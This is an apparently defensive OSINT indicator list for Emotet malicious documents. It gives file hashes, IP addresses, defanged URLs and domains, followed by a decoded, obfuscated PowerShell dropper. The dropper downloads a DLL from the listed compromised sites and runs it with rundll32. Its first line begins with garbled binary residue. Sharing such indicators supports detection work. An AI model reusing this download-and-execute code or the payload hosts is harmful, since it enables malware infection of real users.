Emotet_Doc_out_2020-12-24_16_58.txt

1. #Emotet #Docs #malware #OSINT #IOC
2.  
3. SHA256:
4. 2edf013ada24ea7a142b0844b980169d465e7f5aefdaf645b44ece962d10d74a
5. 0149c806df64185dc66ee1fdc857e25ee93def1f7db847487674959d2b9306d1
6. 036504550e6290a5bd9b8c67b1e7c22de77c5034c8b51865ebe1c1f8d4d339b0
7. f8863f5eb2872b1d2fa17f58ad4121bb0be5a292c832b3f58a674d3ed705b656
8. 9683cbca5d42c99f3b67ebfed13fc32aeca9480bfa9aff2d9dcfc70491eb78b6
9. a61add91d1ec99ec85463137cdefd5a4f56e2bc5885b00b4fdb840347ed6ab4e
10. b45afeb8876a6d7a2a41a6a679095df9cfcf8df3df1a5b5ebf53c74fff0adde9
11. f1d5a90c794b7c27d4575632bb1459b05cb49587630b3431839440c23fcb838a
12. 415ca8fffbcdb3e2deea20cd8dc03d37409c7fc0c175d81364fab2e59738d145
13. 1d16db1a7cce7979231a4688b0fb2fa02c47f59372c0bb539848b87b97fffdd2
14. c5681e7f73b34c33d33ebf5aa9e920a9bb1e0af9f6d3260ba9d49ced57a4cde2
15. 8f1c045c52f380a3dee934291859c8a03f17ef3f96084c3819678fe14f22c0c1
16. 649918360167560700dc33d77632806bcc52576e640559297ce216691ea5dfd1
17. 7321c475e384a9cd1c118ee71fa5e977ef762d64c7bdea4cecb33d64046469d4
18. 6ed5539e92f43fcde23dc6343c4f41a93050576180fad637adc5014a49ed38aa
19. b4de94cda8d3d1fa626c3bf29a3dae027e74addc6c6c6df1890567aa710670c8
20. b96bdcbde5a864db016ff0e5d071c9ab68331ac9c87debcf6e019c901fc8678f
21. 4cc044495efb4f3eb56cb74a8745ee272e83b730e162b661bc796c36df26f849
22. 768f3c029cc79ae21d7c732487da93f0e8c7d19a83737f9ce7e107e3adc9054c
23.  
24.  
25. IPs:
26. 104.18.38.51
27. 104.24.114.4
28. 104.24.115.4
29. 104.27.153.23
30. 166.62.71.224
31. 172.67.137.222
32. 172.67.212.107
33. 5.83.32.101
34. 67.195.197.25
35.  
36.  
37.  
38. URLs:
39. hxxps://accionistas.balneariodealange.com/rumus-jitu-wkg6v/SIGNUP/
40. hxxp://andeanreach.com//System/
41. hxxps://fresh-flowers-galore.com/wp-content/SSChBp8P/
42. hxxps://travianbot.net/wp-admin/58Crtv/
43. hxxps://italymining.eu/wp-includes/en-US/
44. hxxp://biolandmedical.litofis.com/VGX/
45. hxxp://ciroiluminacion.litofis.com/wp-includes/eKWy/
46.  
47.  
48. Domains:
49. accionistas.balneariodealange.com
50. andeanreach.com
51. fresh-flowers-galore.com
52. travianbot.net
53. italymining.eu
54. biolandmedical.litofis.com
55. ciroiluminacion.litofis.com
56.  
57.  
58. Decoded Base64 Powershell:
59. rgrgrgrg���Z��{^��q�jz�趼�������~^<���^,�]z$A5c7 = [TyPE]"{4}{5}{3}{0}{2}{1}" -f dir,oRY,EcT,M.io.,sYS,te;
60. $rFs6 =[tYPe]"{4}{5}{2}{1}{0}{3}{6}" -F pOi,erVicE,NeT.s,nT,S,yStEM.,mAnaGer ;
61. $Sw360o2=R0vc04i;
62. $Ks4z1od=$Rfw0xrv [char]64 $W9i2lzo;
63. $Y7_dxjn=Ygoe0qz;
64. cHilDiTEM vArIabLe:a5C7.vALuE::"C`REaTe`diRECtOry"$HOME {0}P1qccus{0}Q9ow42u{0}-F [chAR]92;
65. $S39xfwk=Au_bga9;
66. varIAblE RFS6.vAlUe::"securi`Typ`ROtocOl" = Tls12;
67. $O0ec5e_=Uoaqdrj;
68. $Unv6y1k = Foau33r;
69. $P3ddjmb=Foualxa;
70. $Us62v6e=Hv43aoi;
71. $A3sgycu=$HOME1dHP1qccus1dHQ9ow42u1dH -CReplace1dH,[chAr]92$Unv6y1k.dll;
72. $M4sbb8f=Jci18id;
73. $Ke7onk9=NEW`-o`BJ`eCT nEt.WEBCLieNt;
74. $Zjjthui=hxxps://accionistas.balneariodealange.com/rumus-jitu-wkg6v/SIGNUP/
75. hxxp://andeanreach.com//System/
76. hxxps://fresh-flowers-galore.com/wp-content/SSChBp8P/
77. hxxps://travianbot.net/wp-admin/58Crtv/
78. hxxps://italymining.eu/wp-includes/en-US/
79. hxxp://biolandmedical.litofis.com/VGX/
80. hxxp://ciroiluminacion.litofis.com/wp-includes/eKWy/."rep`l`AcE"/,[array]/,hwe[0]."spl`iT"$Jo3j922 $Ks4z1od $Qt4ztj9;
81. $E3ute_v=Jontwpx;
82. foreach $Z0f_u3s in $Zjjthui | SOR`T-o`BjE`ct {g`E`T-rANDoM}{try{$Ke7onk9."do`w`NLOaDF`ILE"$Z0f_u3s, $A3sgycu;
83. $Mhoww_6=B2oseq8;
84. If &Get-Item $A3sgycu."le`NGtH" -ge 32511 {&rundll32 $A3sgycu,#1."t`OSTr`iNG";
85. $Jufzvro=X7tnhei;
86. break;
87. $Sim6mjg=Vrovd38}}catch{}}$Gpi6so8=A4zdmn5
88.